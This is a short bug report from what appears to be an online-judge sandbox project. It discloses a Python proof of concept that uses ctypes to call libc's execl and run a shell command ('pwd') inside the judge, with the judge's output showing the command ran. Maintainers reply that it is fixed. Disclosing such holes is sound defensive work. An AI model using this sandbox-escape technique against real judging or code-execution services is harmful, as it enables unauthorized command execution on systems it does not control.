Normal-OJ / Sandbox


[VULN] Python Arbitrary Code Execution #7

Closed asef18766 closed 4 years ago

asef18766 commented 4 years ago

**Describe the bug**
Vulnerability of arbitrary code execution

**To Reproduce**
Steps to reproduce the behavior:

  1. produce the following Python code

```python
import ctypes

command = "pwd"

libc = ctypes.CDLL('libc.so.6')
Cexecve=libc.execl
arg0 = ctypes.create_string_buffer(10)
arg1 = ctypes.create_string_buffer(10)
arg2 = ctypes.create_string_buffer(10)
arg3 = ctypes.create_string_buffer(len(command)+1)

arg0.value = b"/bin/sh"
arg1.value = b"sh"
arg2.value = b"-c"
arg3.value = command.encode()
Cexecve(arg0,arg1,arg2,arg3,0)
```

**Expected behavior**
return RE state

**Current Behavior**
return the following format response
```json
{
    "score": 0,
    "status": 1,
    "cases": [
        {
            "stdout": "/src\n",
            "stderr": "",
            "exitCode": 0,
            "execTime": 17,
            "memoryUsage": 8412,
            "status": 1
        }
    ]
}
```

**Possible Solution**
Add Python seccomp profile or chroot it

as535364 commented 4 years ago

rules will be added in the next version

as535364 commented 4 years ago

fixed